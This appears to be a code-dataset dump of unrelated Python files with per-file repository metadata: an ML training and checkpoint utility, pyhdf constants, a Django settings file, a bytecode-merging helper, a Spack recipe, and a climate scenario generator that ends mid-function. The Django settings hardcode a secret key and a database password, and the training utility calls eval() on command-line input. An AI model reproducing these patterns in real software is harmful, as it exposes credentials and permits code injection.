return str(self)
@property
def _real(self):
return Path(os.path.realpath(self))
@property
def _up(self):
path = os.path.dirname(self)
if path is '':
path = os.path.dirname(self._real)
return Path(path)
@property
def _name(self):
return os.path.basename(self)
@property
def _ext(self):
frags = self._name.rsplit('.', 1)
if len(frags) == 1:
return ''
return frags[1]
extract = extract
load_json = load_json
save_json = save_json
load_txt = load_text
save_txt = save_text
load_p = load_pickle
save_p = save_pickle
def load_csv(self, index_col=0, **kwargs):
return pd.read_csv(self, index_col=index_col, **kwargs)
def save_csv(self, df, float_format='%.5g', **kwargs):
df.to_csv(self, float_format=float_format, **kwargs)
def load_npy(self):
return np.load(self, allow_pickle=True)
def save_npy(self, obj):
np.save(self, obj)
def load_yaml(self):
with open(self, 'r') as f:
return yaml.safe_load(f)
def save_yaml(self, obj):
obj = recurse(obj, lambda x: x._ if type(x) is Path else dict(x) if type(x) is dict else x)
with open(self, 'w') as f:
yaml.dump(obj, f, default_flow_style=False, allow_unicode=True)
def load(self):
return eval('self.load_%s' % self._ext)()
def save(self, obj):
return eval('self.save_%s' % self._ext)(obj)
def wget(self, link):
if self.isdir():
return Path(wget(link, self))
raise ValueError('Path %s needs to be a directory' % self)
class Namespace(object):
def __init__(self, *args, **kwargs):
self.var(*args, **kwargs)
def var(self, *args, **kwargs):
kvs = dict()
for a in args:
if type(a) is str:
kvs[a] = True
else: # a is a dictionary
kvs.update(a)
kvs.update(kwargs)
self.__dict__.update(kvs)
return self
def unvar(self, *args):
for a in args:
self.__dict__.pop(a)
return self
def get(self, key, default=None):
return self.__dict__.get(key, default)
def setdefault(self, *args, **kwargs):
args = [a for a in args if a not in self.__dict__]
kwargs = {k: v for k, v in kwargs.items() if k not in self.__dict__}
return self.var(*args, **kwargs)
##### Functions for compute
using_ipython = True
try:
_ = get_ipython().__class__.__name__
except NameError:
using_ipython = False
try:
import numpy as np
import pandas as pd
import scipy.stats
import scipy as sp
from scipy.stats import pearsonr as pearson, spearmanr as spearman, kendalltau
if not using_ipython:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def _sel(self, col, value):
if type(value) == list:
return self[self[col].isin(value)]
return self[self[col] == value]
pd.DataFrame.sel = _sel
except ImportError:
pass
try:
from sklearn.metrics import roc_auc_score as auroc, average_precision_score as auprc, roc_curve as roc, precision_recall_curve as prc, accuracy_score as accuracy
except ImportError:
pass
def recurse(x, fn):
T = type(x)
if T in [dict, OrderedDict]:
return T((k, recurse(v, fn)) for k, v in x.items())
elif T in [list, tuple]:
return T(recurse(v, fn) for v in x)
return fn(x)
def from_numpy(x):
def helper(x):
if type(x).__module__ == np.__name__:
if type(x) == np.ndarray:
return recurse(list(x), helper)
return np.asscalar(x)
return x
return recurse(x, helper)
def smooth(y, box_pts):
box = np.ones(box_pts) / box_pts
y_smooth = np.convolve(y, box, mode='same')
return y_smooth
def get_gpu_info(ssh_fn=lambda x: x):
nvidia_str, _ = shell(ssh_fn('nvidia-smi --query-gpu=index,name,memory.used,memory.total,utilization.gpu --format=csv,nounits'))
nvidia_str = nvidia_str.replace('[Not Supported]', '100').replace(', ', ',')
nvidia_str_io = StringIO(nvidia_str)
gpu_df = pd.read_csv(nvidia_str_io, index_col=0)
devices_str = os.environ.get('CUDA_VISIBLE_DEVICES')
if devices_str:
devices = list(map(int, devices_str.split(',')))
gpu_df = gpu_df.loc[devices]
gpu_df.index = gpu_df.index.map({k: i for i, k in enumerate(devices)})
out_df = pd.DataFrame(index=gpu_df.index)
out_df['memory_total'] = gpu_df['memory.total [MiB]']
out_df['memory_used'] = gpu_df['memory.used [MiB]']
out_df['memory_free'] = out_df['memory_total'] - out_df['memory_used']
out_df['utilization'] = gpu_df['utilization.gpu [%]'] / 100
out_df['utilization_free'] = 1 - out_df['utilization']
return out_df
def get_process_gpu_info(pid=None, ssh_fn=lambda x: x):
nvidia_str, _ = shell(ssh_fn('nvidia-smi --query-compute-apps=pid,gpu_name,used_gpu_memory --format=csv,nounits'))
nvidia_str_io = StringIO(nvidia_str.replace(', ', ','))
gpu_df = pd.read_csv(nvidia_str_io, index_col=0)
if pid is None:
return gpu_df
if pid == -1:
pid = os.getpid()
return gpu_df.loc[pid]
##### torch functions
try:
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
def to_torch(x, device='cuda'):
def helper(x):
if x is None:
return None
elif type(x) == torch.Tensor:
return x.to(device)
elif type(x) in [str, bool, int, float]:
return x
return torch.from_numpy(x).to(device)
return recurse(x, helper)
def from_torch(t):
def helper(t):
if type(t) != torch.Tensor:
return t
x = t.detach().cpu().numpy()
if x.size == 1 or np.isscalar(x):
return np.asscalar(x)
return x
return recurse(t, helper)
def count_params(network, requires_grad=False):
return sum(p.numel() for p in network.parameters() if not requires_grad or p.requires_grad)
def report_memory(device=None, max=False):
if device:
device = torch.device(device)
if max:
alloc = torch.cuda.max_memory_allocated(device=device)
else:
alloc = torch.cuda.memory_allocated(device=device)
alloc /= 1024 ** 2
print('%.3f MBs' % alloc)
return alloc
numels = Counter()
for obj in gc.get_objects():
if torch.is_tensor(obj):
print(type(obj), obj.size())
numels[obj.device] += obj.numel()
print()
for device, numel in sorted(numels.items()):
print('%s: %s elements, %.3f MBs' % (str(device), numel, numel * 4 / 1024 ** 2))
def clear_gpu_memory():
gc.collect()
torch.cuda.empty_cache()
for obj in gc.get_objects():
if torch.is_tensor(obj):
obj.cpu()
gc.collect()
torch.cuda.empty_cache()
except ImportError:
pass
try:
from apex import amp
except ImportError:
pass
def main_only(method):
def wrapper(self, *args, **kwargs):
if self.main:
return method(self, *args, **kwargs)
return wrapper
class Config(Namespace):
def __init__(self, res, *args, **kwargs):
self.res = Path(res)._real
super(Config, self).__init__(*args, **kwargs)
self.setdefault(
name=self.res._real._name,
main=True,
logger=True,
device='cuda',
debug=False,
opt_level='O0'
)
def __repr__(self):
return format_yaml(vars(self))
def __hash__(self):
return hash(repr(self))
@property
def path(self):
return self.res / (type(self).__name__.lower() + '.yaml')
def load(self):
if self.path.exists():
for k, v in self.path.load().items():
setattr(self, k, v)
return self
never_save = {'res', 'name', 'main', 'logger', 'distributed', 'parallel', 'device', 'debug'}
@property
def attrs_save(self):
return {k: v for k, v in vars(self).items() if k not in self.never_save}
def save(self, force=False):
if force or not self.path.exists():
self.res.mk()
self.path.save(from_numpy(self.attrs_save))
return self
def clone(self):
return self._clone().save()
def clone_(self):
return self.cp_(self.res._real.clone())
def cp(self, path, *args, **kwargs):
return self.cp_(path, *args, **kwargs).save()
def cp_(self, path, *args, **kwargs):
'''
path: should be absolute or relative to self.res._up
'''
attrs = self.attrs_save
for a in args:
kwargs[a] = True
kwargs = {k: v for k, v in kwargs.items() if v != attrs.get(k)}
merged = attrs.copy()
merged.update(kwargs)
if os.path.isabs(path):
new_res = path
else:
new_res = self.res._up / path
return Config(new_res).var(**merged)
@classmethod
def from_args(cls):
import argparse
parser = argparse.ArgumentParser(description='Model arguments')
parser.add_argument('res', type=Path, help='Result directory')
parser.add_argument('kwargs', nargs='*', help='Extra arguments that goes into the config')
args = parser.parse_args()
kwargs = {}
for kv in args.kwargs:
splits = kv.split('=')
if len(splits) == 1:
v = True
else:
v = splits[1]
try:
v = eval(v)
except (SyntaxError, NameError):
pass
kwargs[splits[0]] = v
return cls(args.res).load().var(**kwargs).save()
@classmethod
def clean(cls, *directories):
configs = cls.load_all(*directories)
for config in configs:
if not (config.train_results.exists() or len(config.models.ls()[1]) > 0):
config.res.rm()
self.log('Removed %s' % config.res)
@main_only
def log(self, text):
logger(self.res if self.logger else None)(text)
def on_train_start(self, s):
step = s.step
s.step_max = self.steps
self.setdefault(
step_save=np.inf,
time_save=np.inf,
patience=np.inf,
step_print=1,
)
s.var(
step_max=self.steps,
last_save_time=time(),
record_step=False,
last_record_step=step,
last_record_state=None,
results=self.load_train_results()
)
if self.main and self.training.exists():
self.log('Quitting because another training is found')
exit()
self.set_training(True)
import signal
def handler(signum, frame):
self.on_train_end(s)
exit()
s.prev_handler = signal.signal(signal.SIGINT, handler)
s.writer = None
if self.main and self.get('use_tb', True):
from torch.utils.tensorboard import SummaryWriter
s.writer = SummaryWriter(log_dir=self.res, flush_secs=10)
if self.stopped_early.exists():
self.log('Quitting at step %s because already stopped early before' % step)
s.step_max = step
return
self.log(str(self))
self.log('Network has %s parameters' % count_params(s.net))
s.progress = None
if self.main:
self.log('Training %s from step %s to step %s' % (self.name, step, s.step_max))
s.progress = iter(RangeProgress(step, s.step_max, desc=self.name))
def on_step_end(self, s):
step = s.step
results = s.results
step_result = s.step_result
if results is None:
s.results = results = pd.DataFrame(columns=step_result.index, index=pd.Series(name='step'))
prev_time = 0
if len(results):
last_step = results.index[-1]
prev_time = (step - 1) / last_step * results.loc[last_step, 'total_train_time']
tot_time = step_result['total_train_time'] = prev_time + step_result['train_time']
if step_result.index.isin(results.columns).all():
results.loc[step] = step_result
else:
step_result.name = step
s.results = results = results.append(step_result)
if s.record_step:
s.last_record_step = step
s.last_record_state = self.get_state(s.net, s.opt, step)
self.log('Recorded state at step %s' % step)
s.record_step = False
if step - s.last_record_step > self.patience:
self.set_stopped_early()
self.log('Stopped early after %s / %s steps' % (step, s.step_max))
s.step_max = step
return
if s.writer:
for k, v in step_result.items():
if 'time' in k:
v /= 60.0 # convert seconds to minutes
s.writer.add_scalar(k, v, global_step=step, walltime=tot_time)
if step % self.step_save == 0 or time() - s.last_save_time >= self.time_save:
self.save_train_results(results)
self.save_state(step, self.get_state(s.net, s.opt, step), link_best=False)
s.last_save_time = time()
if step % self.step_print == 0:
self.log(' | '.join([
'step {:3d}'.format(step),
'{:4.2f} mins'.format(step_result['total_train_time'] / 60),
*('{} {:10.5g}'.format(k, v) for k, v in zip(step_result.index, step_result)
if k != 'total_train_time')
]))
if s.progress: next(s.progress)
sys.stdout.flush()
def on_train_end(self, s):
step = s.step
if s.results is not None:
self.save_train_results(s.results)
s.results = None
if s.last_record_state:
if not self.model_save(s.last_record_step).exists():
save_path = self.save_state(s.last_record_step, s.last_record_state, link_best=True)
s.last_record_state = None
# Save latest model
if step > 0 and not self.model_save(step).exists():
save_path = self.save_state(step, self.get_state(s.net, s.opt, step))
if s.progress: s.progress.close()
if s.writer: s.writer.close()
self.set_training(False)
import signal
signal.signal(signal.SIGINT, s.prev_handler)
def train(self, steps=1000000, cd=True, gpu=True, env_gpu=True, opt='O0', log=True):
cd = ('cd %s\n' % self.res) if cd else ''
cmd = []
if env_gpu is False or env_gpu is None:
cmd.append('CUDA_VISIBLE_DEVICES=')
n_gpu = 0
elif type(env_gpu) is int:
cmd.append('CUDA_VISIBLE_DEVICES=%s' % env_gpu)
n_gpu = 1
elif type(env_gpu) in [list, tuple]:
cmd.append('CUDA_VISIBLE_DEVICES=%s' % ','.join(map(str, env_gpu)))
n_gpu = len(env_gpu)
else:
n_gpu = 4
cmd.append('python3')
if n_gpu > 1:
cmd.append(
'-m torch.distributed.launch --nproc_per_node=%s --use_env' % n_gpu
)
cmd.extend([
Path(self.model).rel(self.res),
'.',
'steps=%s' % steps,
'opt_level=%s' % opt
])
if gpu is False or gpu is None:
cmd.append('device=cpu')
elif type(gpu) is int:
cmd.append('device=cuda:%s' % gpu)
return cd + ' '.join(cmd)
def init_model(self, net, opt=None, step='max', train=True):
if train:
assert not self.training.exists(), 'Training already exists'
# configure parallel training
devices = os.environ.get('CUDA_VISIBLE_DEVICES')
self.n_gpus = 0 if self.device == 'cpu' else 1 if self.device.startswith('cuda:') else len(devices.split(','))
can_parallel = self.n_gpus > 1
self.setdefault(distributed=can_parallel) # use distributeddataparallel
self.setdefault(parallel=can_parallel and not self.distributed) # use dataparallel
self.local_rank = 0
self.world_size = 1 # number of processes
if self.distributed:
self.local_rank = int(os.environ['LOCAL_RANK']) # rank of the current process
self.world_size = int(os.environ['WORLD_SIZE'])
assert self.world_size == self.n_gpus
torch.cuda.set_device(self.local_rank)
torch.distributed.init_process_group(backend='nccl', init_method='env://')
self.main = self.local_rank == 0
net.to(self.device)
if train and self.opt_level != 'O0':
# configure mixed precision
net, opt = amp.initialize(net, opt, opt_level=self.opt_level, loss_scale=self.get('loss_scale'))
step = self.set_state(net, opt=opt, step=step)
if self.distributed:
import apex
net = apex.parallel.DistributedDataParallel(net)
elif self.parallel:
net = nn.DataParallel(net)
if train:
net.train()
return net, opt, step
else:
net.eval()
return net, step
@property
def train_results(self):
return self.res / 'train_results.csv'
def load_train_results(self):
if self.train_results.exists():
return pd.read_csv(self.train_results, index_col=0)
return None
@main_only
def save_train_results(self, results):
results.to_csv(self.train_results, float_format='%.6g')
@property
def stopped_early(self):
return self.res / 'stopped_early'
@main_only
def set_stopped_early(self):
self.stopped_early.save_txt('')
@property
def training(self):
return self.res / 'is_training'
@main_only
def set_training(self, is_training):
if is_training:
self.training.save_txt('')
else:
self.training.rm()
@property
def models(self):
return (self.res / 'models').mk()
def model_save(self, step):
return self.models / ('model-%s.pth' % step)
def model_step(self, path):
m = re.match('.+/model-(\d+)\.pth', path)
if m:
return int(m.groups()[0])
@property
def model_best(self):
return self.models / 'best_model.pth'
@main_only
def link_model_best(self, model_save):
self.model_best.rm().link(Path(model_save).rel(self.models))
def get_saved_model_steps(self):
_, save_paths = self.models.ls()
if len(save_paths) == 0:
return []
return sorted([x for x in map(self.model_step, save_paths) if x is not None])
@main_only
def clean_models(self, keep=5):
model_steps = self.get_saved_model_steps()
delete = len(model_steps) - keep
keep_paths = [self.model_best._real, self.model_save(model_steps[-1])._real]
for e in model_steps:
if delete <= 0:
break
path = self.model_save(e)._real
if path in keep_paths:
continue
path.rm()
delete -= 1
self.log('Removed model %s' % path.rel(self.res))
def set_state(self, net, opt=None, step='max', path=None):
state = self.load_state(step=step, path=path)
if state is None:
return 0
if self.get('append_module_before_load'):
state['net'] = dict(('module.' + k, v) for k, v in state['net'].items())
net.load_state_dict(state['net'])
if opt and 'opt' in state:
opt.load_state_dict(state['opt'])
if 'amp' in state and self.opt_level != 'O0':
amp.load_state_dict(state['amp'])
return state['step']
@main_only
def get_state(self, net, opt, step):
try:
net_dict = net.module.state_dict()
except AttributeError:
net_dict = net.state_dict()
state = dict(step=step, net=net_dict, opt=opt.state_dict())
try:
state['amp'] = amp.state_dict()
except:
pass
return to_torch(state, device='cpu')
def load_state(self, step='max', path=None):
'''
step: best, max, integer, None if path is specified
path: None if step is specified
'''
if path is None:
if step == 'best':
path = self.model_best
else:
if step == 'max':
steps = self.get_saved_model_steps()
if len(steps) == 0:
return None
step = max(steps)
path = self.model_save(step)
save_path = Path(path)
if save_path.exists():
return to_torch(torch.load(save_path), device=self.device)
return None
@main_only
def save_state(self, step, state, clean=True, link_best=False):
save_path = self.model_save(step)
torch.save(state, save_path)
self.log('Saved model %s at step %s' % (save_path, step))
if clean and self.get('max_save'):
self.clean_models(keep=self.max_save)
if link_best:
self.link_model_best(save_path)
self.log('Linked %s to new saved model %s' % (self.model_best, save_path))
return save_path
import enlighten
progress_manager = enlighten.get_manager()
active_counters = []
class Progress(object):
def __init__(self, total, desc='', leave=False):
self.counter = progress_manager.counter(total=total, desc=desc, leave=leave)
active_counters.append(self.counter)
def __iter__(self):
return self
def __next__(self):
raise NotImplementedError()
def close(self):
self.counter.close()
if self.counter in active_counters:
active_counters.remove(self.counter)
if len(active_counters) == 0:
progress_manager.stop()
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
class RangeProgress(Progress):
def __init__(self, start, end, step=1, desc='', leave=False):
self.i = start
self.start = start
self.end = end
self.step = step
super(RangeProgress, self).__init__((end - start) // step, desc=desc, leave=leave)
def __next__(self):
if self.i != self.start:
self.counter.update()
if self.i == self.end:
self.close()
raise StopIteration()
i = self.i
self.i += self.step
return i
### Paths ###
Proj = Path(__file__)._up
Cache = Proj / 'cache'
Distiller = Proj / 'distiller'
Data = Proj / 'data'
Res = (Proj / 'results').mk() | 30.661017 | 165 | 0.579878 |
7cf24248d26ab3dd670c2a949c5aad3bc3397782 | 1,927 | py | Python | HDF4_H5_NETCDF/source2.7/pyhdf/HC.py | Con-Mi/lambda-packs | b23a8464abdd88050b83310e1d0e99c54dac28ab | [
"MIT"
] | null | null | null | HDF4_H5_NETCDF/source2.7/pyhdf/HC.py | Con-Mi/lambda-packs | b23a8464abdd88050b83310e1d0e99c54dac28ab | [
"MIT"
] | null | null | null | HDF4_H5_NETCDF/source2.7/pyhdf/HC.py | Con-Mi/lambda-packs | b23a8464abdd88050b83310e1d0e99c54dac28ab | [
"MIT"
] | null | null | null | # $Id: HC.py,v 1.2 2005-07-14 01:36:41 gosselin_a Exp $
# $Log: not supported by cvs2svn $
# Revision 1.1 2004/08/02 15:36:04 gosselin
# Initial revision
#
from . import hdfext as _C
class HC(object):
"""The HC class holds contants defining opening modes and data types.
File opening modes (flags ORed together)
CREATE 4 create file if it does not exist
READ 1 read-only mode
TRUNC 256 truncate if it exists
WRITE 2 read-write mode
Data types
CHAR 4 8-bit char
CHAR8 4 8-bit char
UCHAR 3 unsigned 8-bit integer (0 to 255)
UCHAR8 3 unsigned 8-bit integer (0 to 255)
INT8 20 signed 8-bit integer (-128 to 127)
UINT8 21 unsigned 8-bit integer (0 to 255)
INT16 23 signed 16-bit integer
UINT16 23 unsigned 16-bit integer
INT32 24 signed 32-bit integer
UINT32 25 unsigned 32-bit integer
FLOAT32 5 32-bit floating point
FLOAT64 6 64-bit floating point
Tags
DFTAG_NDG 720 dataset
DFTAG_VH 1962 vdata
DFTAG_VG 1965 vgroup
"""
CREATE = _C.DFACC_CREATE
READ = _C.DFACC_READ
TRUNC = 0x100 # specific to pyhdf
WRITE = _C.DFACC_WRITE
CHAR = _C.DFNT_CHAR8
CHAR8 = _C.DFNT_CHAR8
UCHAR = _C.DFNT_UCHAR8
UCHAR8 = _C.DFNT_UCHAR8
INT8 = _C.DFNT_INT8
UINT8 = _C.DFNT_UINT8
INT16 = _C.DFNT_INT16
UINT16 = _C.DFNT_UINT16
INT32 = _C.DFNT_INT32
UINT32 = _C.DFNT_UINT32
FLOAT32 = _C.DFNT_FLOAT32
FLOAT64 = _C.DFNT_FLOAT64
FULL_INTERLACE = 0
NO_INTERLACE =1
# NOTE:
# INT64 and UINT64 are not yet supported py pyhdf
DFTAG_NDG = _C.DFTAG_NDG
DFTAG_VH = _C.DFTAG_VH
DFTAG_VG = _C.DFTAG_VG
| 26.763889 | 73 | 0.582771 |
a6c747d6e67eb75ec6145962ef028a77a3a608b2 | 159 | py | Python | utils/config.py | aguirrejuan/hipposeg | 1059feb677a8fa6f9903d18df1753eaf3be68d7c | [
"MIT"
] | null | null | null | utils/config.py | aguirrejuan/hipposeg | 1059feb677a8fa6f9903d18df1753eaf3be68d7c | [
"MIT"
] | null | null | null | utils/config.py | aguirrejuan/hipposeg | 1059feb677a8fa6f9903d18df1753eaf3be68d7c | [
"MIT"
] | null | null | null | from easydict import EasyDict as edict
__C = edict()
# from config import cfg
cfg = __C
__C.CROP = 160 | 19.875 | 39 | 0.477987 |
198bd56f96a9d7633bdd5f88ba8276c4b4c9dafc | 3,497 | py | Python | code_utils.py | martmists/mixin | bf1bbd71ddfa189f6ea552a0f07d7caa723a219d | [
"MIT"
] | 1 | 2020-08-04T12:26:33.000Z | 2020-08-04T12:26:33.000Z | code_utils.py | martmists/mixin | bf1bbd71ddfa189f6ea552a0f07d7caa723a219d | [
"MIT"
] | null | null | null | code_utils.py | martmists/mixin | bf1bbd71ddfa189f6ea552a0f07d7caa723a219d | [
"MIT"
] | null | null | null | import dis
import struct
from types import CodeType
from typing import Tuple
def new_code(fc, *, argcount=None, posonlyargcount=None, kwonlyargcount=None, nlocals=None, stacksize=None, flags=None,
code_=None, consts=None, names=None, varnames=None, filename=None, name=None, firstlineno=None,
lnotab=None, freevars=None, cellvars=None):
# I could use fc.replace but I prefer having a utility function since it's easier to debug
return CodeType(
argcount or fc.co_argcount,
posonlyargcount or fc.co_posonlyargcount,
kwonlyargcount or fc.co_kwonlyargcount,
nlocals or fc.co_nlocals,
stacksize or fc.co_stacksize,
flags or fc.co_flags,
code_ or fc.co_code,
consts or fc.co_consts,
names or fc.co_names,
varnames or fc.co_varnames,
filename or fc.co_filename,
name or fc.co_name,
firstlineno or fc.co_firstlineno,
lnotab or fc.co_lnotab,
freevars or fc.co_freevars,
cellvars or fc.co_cellvars
)
def new_instruction(instr, *, opname=None, opcode=None, arg=None, argval=None, argrepr=None, offset=None, starts_line=None, is_jump_target=None):
# Creates a new instruction since namedtuples aren't mutable
return dis.Instruction(
opname or instr.opname,
opcode or instr.opcode,
arg or instr.arg,
argval or instr.argval,
argrepr or instr.argrepr,
offset or instr.offset,
starts_line or instr.starts_line,
is_jump_target or instr.is_jump_target
)
def merge_code(original: CodeType, added: CodeType) -> Tuple[CodeType, bytes]:
# Merges consts, varnames and names (though names probably isn't useful here)
# It also takes the max stack size of the two and increases it by 1 to be safe.
all_consts = list(original.co_consts)
all_varnames = list(original.co_varnames)
all_names = list(original.co_names)
remapped_instructions = []
for instruction in dis.get_instructions(added):
if instruction.opcode in dis.hasconst:
if instruction.argval in all_consts:
instruction = new_instruction(instruction, arg=all_consts.index(instruction.argval))
else:
instruction = new_instruction(instruction, arg=len(all_consts))
all_consts.append(instruction.argval)
elif instruction.opcode in dis.haslocal:
if instruction.argval in all_varnames:
instruction = new_instruction(instruction, arg=all_varnames.index(instruction.argval))
else:
instruction = new_instruction(instruction, arg=len(all_varnames))
all_varnames.append(instruction.argval)
elif instruction.opcode in dis.hasname:
if instruction.argval in all_names:
instruction = new_instruction(instruction, arg=all_names.index(instruction.argval))
else:
instruction = new_instruction(instruction, arg=len(all_names))
all_names.append(instruction.argval)
remapped_instructions.append(instruction)
return (new_code(original,
consts=tuple(all_consts),
names=tuple(all_names),
varnames=tuple(all_varnames),
stacksize=max([original.co_stacksize, added.co_stacksize])+1),
b"".join(struct.pack("BB", b.opcode, b.arg or 0) for b in remapped_instructions))
| 44.833333 | 145 | 0.665713 |
b1122022dbc3f2e09b0549845101c4fe00068afb | 408 | py | Python | tog_project_log/tog_project_log/wsgi.py | Tog-Hackerspace/Project-Log | 7bf89e3ee437fa5021287a8f08471bf27ed6ad4f | [
"MIT"
] | null | null | null | tog_project_log/tog_project_log/wsgi.py | Tog-Hackerspace/Project-Log | 7bf89e3ee437fa5021287a8f08471bf27ed6ad4f | [
"MIT"
] | 9 | 2016-09-27T10:24:29.000Z | 2016-10-04T16:23:56.000Z | tog_project_log/tog_project_log/wsgi.py | Tog-Hackerspace/Project-Log | 7bf89e3ee437fa5021287a8f08471bf27ed6ad4f | [
"MIT"
] | null | null | null | """
WSGI config for tog_project_log project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tog_project_log.settings")
application = get_wsgi_application()
| 24 | 78 | 0.794118 |
e866245794f4b93fca9a017ac268c489f0dade71 | 1,194 | py | Python | var/spack/repos/builtin/packages/py-testinfra/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2018-11-27T03:39:44.000Z | 2021-09-06T15:50:35.000Z | var/spack/repos/builtin/packages/py-testinfra/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-01-11T20:11:52.000Z | 2019-01-11T20:11:52.000Z | var/spack/repos/builtin/packages/py-testinfra/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-10-14T14:20:17.000Z | 2020-10-14T14:20:17.000Z | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyTestinfra(PythonPackage):
"""With Testinfra you can write unit tests in Python to test actual state
of your servers configured by management tools like Salt, Ansible, Puppet,
Chef and so on."""
homepage = "https://testinfra.readthedocs.io"
url = "https://pypi.python.org/packages/source/t/testinfra/testinfra-1.11.1.tar.gz"
version('1.13.0', '1e0a135c784207f8609e7730901f1291')
version('1.12.0', '9784c01d7af3d624c6ec3cd25cce2011')
version('1.11.1', 'c64ce6b16661d647c62c9508de419f5f')
depends_on('py-setuptools', type='build')
depends_on('py-importlib', when='^python@2.6.0:2.6.999', type=('build', 'run'))
depends_on('py-pytest@:3.0.1,3.0.3:', type=('build', 'run'))
depends_on('py-six@1.4:', type=('build', 'run'))
# Required for testing remote systems
depends_on('py-paramiko', type=('build', 'run'))
# Required for parallel execution
depends_on('py-pytest-xdist', type=('build', 'run'))
| 38.516129 | 92 | 0.693467 |
82b4ced807fd9ed4300cc5587015641557a9cce9 | 3,537 | py | Python | lookbook/lookbook/settings.py | bdizon/instagram-lookbook | 659e378c513dfc070085c7543532f345076097d0 | [
"MIT"
] | null | null | null | lookbook/lookbook/settings.py | bdizon/instagram-lookbook | 659e378c513dfc070085c7543532f345076097d0 | [
"MIT"
] | null | null | null | lookbook/lookbook/settings.py | bdizon/instagram-lookbook | 659e378c513dfc070085c7543532f345076097d0 | [
"MIT"
] | null | null | null | """
Django settings for lookbook project.
Generated by 'django-admin startproject' using Django 3.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '0d34)ds!bs#8lm8*pmfam4y27%n#sz88cj@7^f911$b^t51&73'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api.apps.ApiConfig',
'rest_framework',
'frontend.apps.FrontendConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lookbook.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lookbook.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'lookbookdb',
'USER': 'postgres',
'PASSWORD': 'password',
'HOST': '127.0.0.1',
'PORT': '5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| 25.264286 | 92 | 0.651117 |
f64469fca59af06270ec5adb7a0c9f8f0f54df6e | 15,743 | py | Python | tmp_pcp_Generator.py | saeedashraf/snow-ski-resort-finance | 0ee1d0336b417e9c26b2166de198e8452ee02c71 | [
"MIT"
] | null | null | null | tmp_pcp_Generator.py | saeedashraf/snow-ski-resort-finance | 0ee1d0336b417e9c26b2166de198e8452ee02c71 | [
"MIT"
] | 11 | 2021-02-09T11:30:32.000Z | 2022-03-12T00:46:35.000Z | tmp_pcp_Generator.py | saeedashraf/Snow-Ski-Resort-DMDU | 0ee1d0336b417e9c26b2166de198e8452ee02c71 | [
"MIT"
] | 1 | 2020-05-26T09:02:08.000Z | 2020-05-26T09:02:08.000Z | import os
import os.path
import random
from operator import add
from datetime import datetime, date, timedelta
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
import shutil
# Step 1: Setting Up Climate Scenarios (CH2018, and Random Scenarios)
def is_leap(year):
""" return true for leap years, False for non leap years """
return year % 4 == 0 and ( year % 100 != 0 or year % 400 == 0)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
## S1.1. Function that pruduces new climate (precipitation) realization
def random_pcp(dfpcp, FirstYear, LastYear, ScenarioNumbers, RCPNames, Xfactor1):
#outFileName = OutFileName
dfpcpCol = dfpcp.columns
#sceNum = len(dfCol)
